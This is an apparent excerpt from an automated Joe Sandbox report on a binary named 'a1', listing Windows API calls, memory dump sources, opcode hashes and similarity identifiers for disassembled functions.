                                                                                                                                                                                                                                                                            • Part of subcall function 002F0D10: GetLastError.KERNEL32(?,?,00000000,003BABD6,000000FF,?,002F0F2A,000000FF,?,00000001), ref: 002F0D56
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer$ConnectErrorFileHeapLastNamedPipeProcessWrite
                                                                                                                                                                                                                                                                          • String ID: \\.\pipe\ToServer
                                                                                                                                                                                                                                                                          • API String ID: 3549655173-63420281
                                                                                                                                                                                                                                                                          • Opcode ID: c965d3e80e2c4407f7168c7e90130b9b20c9ea1676726f7d3428c5ac54705345
                                                                                                                                                                                                                                                                          • Instruction ID: 5bdee681acded01406de19ee64ece5e1a8873c1d880f615a479e82e3b15bb12a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c965d3e80e2c4407f7168c7e90130b9b20c9ea1676726f7d3428c5ac54705345
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0741CC72604209EFDB14CF58C845BAEB7E8EB44724F10866EFA15DB381DBB5A900CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00345D0F
                                                                                                                                                                                                                                                                            • Part of subcall function 0034680C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0034687F
                                                                                                                                                                                                                                                                            • Part of subcall function 0034680C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00346890
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                          • String ID: h]4
                                                                                                                                                                                                                                                                          • API String ID: 1269201914-2535756838
                                                                                                                                                                                                                                                                          • Opcode ID: a72a9b2d789fc3a0182be0cdbdb56f3b48f73d1d32564827cced6c6d5f12e60f
                                                                                                                                                                                                                                                                          • Instruction ID: d691a5419d386cdbd255e42f98e3d03bb224c489da54918206ef0a3845b1add3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a72a9b2d789fc3a0182be0cdbdb56f3b48f73d1d32564827cced6c6d5f12e60f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07B012E7A59601BD324656096C07D37038CC8C1F11331893BB404CC052E4482C441136
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547E10: GetProcessHeap.KERNEL32 ref: 6A547E6C
                                                                                                                                                                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000003C,?,?,00000000,AA831995), ref: 6A56136A
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6A561377
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CrackErrorHeapInternetLastProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 303965512-0
                                                                                                                                                                                                                                                                          • Opcode ID: e5598fa738ae25870cdd8ecbedbddb79db48f7d080ce203b7ab99da4de626ad4
                                                                                                                                                                                                                                                                          • Instruction ID: d9c1c20ddcd2ad61581966099c0e6e3607e0c884c03871a624d90157a6284ea6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5598fa738ae25870cdd8ecbedbddb79db48f7d080ce203b7ab99da4de626ad4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4D1717090154ADBDB01CFA8C848BAEFBB9FF45314F158259E415EB2A2EB709D45CBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00368FBC: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00368FE7
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,003692D3,?,00000000,?,?,?), ref: 003694ED
                                                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,003692D3,?,00000000,?,?,?), ref: 0036952F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 546120528-0
                                                                                                                                                                                                                                                                          • Opcode ID: 26ddc8ef8498d3296ca46b4edb1eba7ed241ddf67785dcf54930f6fdeef9e713
                                                                                                                                                                                                                                                                          • Instruction ID: ccd45a50ef02a4b49af2e230207ae14ae5494653385c0b87497f4e10c6c4a788
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26ddc8ef8498d3296ca46b4edb1eba7ed241ddf67785dcf54930f6fdeef9e713
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D510170A003449EDB23CF35C884BAABBEDEF86310F19856FD1968B256E6749946CB50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001C,00000000,AA831995,00000000,AA831995,6A59E7BE,000000FF), ref: 6A565970
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547E10: GetProcessHeap.KERNEL32 ref: 6A547E6C
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,80004005), ref: 6A565A2B
                                                                                                                                                                                                                                                                            • Part of subcall function 6A549220: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,6A5659A5,-00000010), ref: 6A549258
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FindFolderFreeHeapLibraryPathProcessResourceSpecial
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 584424649-0
                                                                                                                                                                                                                                                                          • Opcode ID: b8402efb4a35ea34453789ef52d16a9cda875c26ce446fe9cefeb52929c8800d
                                                                                                                                                                                                                                                                          • Instruction ID: 990354e8bcc9c8a758b4432eba7922a65302b4d862856d595d08764cb812f4eb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8402efb4a35ea34453789ef52d16a9cda875c26ce446fe9cefeb52929c8800d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4231C0B06402099FDB24DF68C808BAEB7F8FF04314F11451EE91ADB682DF70AA04CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 6A561139
                                                                                                                                                                                                                                                                          • InternetSetOptionW.WININET(?,00000006,000000FF,00000004), ref: 6A561167
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 942729171-0
                                                                                                                                                                                                                                                                          • Opcode ID: a0437eb31bddcd041ad128f4d901245112bfe930539ed62279417398fa2c3942
                                                                                                                                                                                                                                                                          • Instruction ID: ed9c25b02c3fa865293cd6ff69d1c19621fcc8dd6c4652dbeb3d61ca02c2370b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0437eb31bddcd041ad128f4d901245112bfe930539ed62279417398fa2c3942
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72315CB090064AEFDB00CF59C946B9AFBF4FB04314F10825DE519AB780C7B5AA54CBD1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,00362E29,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0036374F
                                                                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00362E29,?,?,00000000,?,00000000), ref: 0036376D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: String
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                          • Opcode ID: 664d5569f1938763d68ff763ff974bd262b670c9d735656e2e50417fac842946
                                                                                                                                                                                                                                                                          • Instruction ID: cb313622a9150748da6f03b48cf862584fe04f6b1efab6108d5a8efc7f196798
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 664d5569f1938763d68ff763ff974bd262b670c9d735656e2e50417fac842946
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F0687240011ABBCF136FA0EC09DDE3F6AAF483A1F058110FA1965020CA32DA31AB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,0036A60F,?,00000000,?,?,0036A8B0,?,00000007,?,?,0036AD02,?,?), ref: 00361713
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0036A60F,?,00000000,?,?,0036A8B0,?,00000007,?,?,0036AD02,?,?), ref: 0036171E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                                                          • Opcode ID: 27e49c7da156b32dba7ab22cec076ab2ed08b5c23ba90ab069b059698b766843
                                                                                                                                                                                                                                                                          • Instruction ID: 4d9aeed74ca841b9935932e4cdb371f97074d3f49f3cb7f7eec529c697abf9ef
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27e49c7da156b32dba7ab22cec076ab2ed08b5c23ba90ab069b059698b766843
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9E08C32500214EBCB133FB4EC0DB897BA9BB00791F058020F60CDE461EA34E850C794
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 002C960B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer$HeapProcess_wcschr
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 978982089-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9c12430f094ef340ebdd8efaac4bbfad485036e54b6f61ae073488355b4c0c8e
                                                                                                                                                                                                                                                                          • Instruction ID: 0cbcb3b4df9aab18504433da7a5933f6a9df8e356afa7183cc211ffcf5d6c65c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c12430f094ef340ebdd8efaac4bbfad485036e54b6f61ae073488355b4c0c8e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47F19B71A106068FDB00CFA8C888FAEF7B5FF56314F14835DE511AB2A1DB74A995CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,00000000,?,00000000,80004005,?,?,?,DF534560), ref: 002DA69B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DeleteFile
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4033686569-0
                                                                                                                                                                                                                                                                          • Opcode ID: ff5a6acba23b6f9e2726db336ca1a0d26d4702f736b1e5cace2ca5b426464c3c
                                                                                                                                                                                                                                                                          • Instruction ID: d421f159a9caed4800514c510a2835063f7930a0b85ae0943157598011108e59
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff5a6acba23b6f9e2726db336ca1a0d26d4702f736b1e5cace2ca5b426464c3c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2351E172A00615DFDB11CF58C881F9EFBB8FB04710F14826AE914EB781D775AC108BA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnumResourceLanguagesW.KERNEL32(?,00000010,00000001,002DBB50,?), ref: 002DB9BB
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EnumLanguagesResource
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4141015960-0
                                                                                                                                                                                                                                                                          • Opcode ID: aa0b0af31654d4ad329b0bbfa6ec6522077a5ed8d97601cdd1975ce731c883fa
                                                                                                                                                                                                                                                                          • Instruction ID: f1887a5f1eb635d5f8e420b41f184cceda3a84ae715084614cd55cb9a755fbd5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa0b0af31654d4ad329b0bbfa6ec6522077a5ed8d97601cdd1975ce731c883fa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C519F71A1020ADBDB11CF98C891BAEB7F4FF58304F11066AE855AB381DB71ED14CBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,DF534560,00000000,?,?,00000001), ref: 002F5534
                                                                                                                                                                                                                                                                            • Part of subcall function 001C7340: RaiseException.KERNEL32(DF534560,DF534560,00000000,00000000,002F56DB,C000008C,00000001,DF534560), ref: 001C734C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionObjectRaiseSingleWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2077088295-0
                                                                                                                                                                                                                                                                          • Opcode ID: 44d6d4fac9c0711f6562cee90a55a51de88d3e811dfcccd6e54effb7a3dcc346
                                                                                                                                                                                                                                                                          • Instruction ID: c4fe88bbe255a41fe75d939be637b349752a37eeb947c6eeb3db7993fa617d16
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44d6d4fac9c0711f6562cee90a55a51de88d3e811dfcccd6e54effb7a3dcc346
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D517F35A10A1A9FCB04DF68C884A6AF7B5FF49350F554169EA25DB3A1DB30ED20CF90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(E8458D00,?,003692DF,003692D3,00000000), ref: 003690C2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
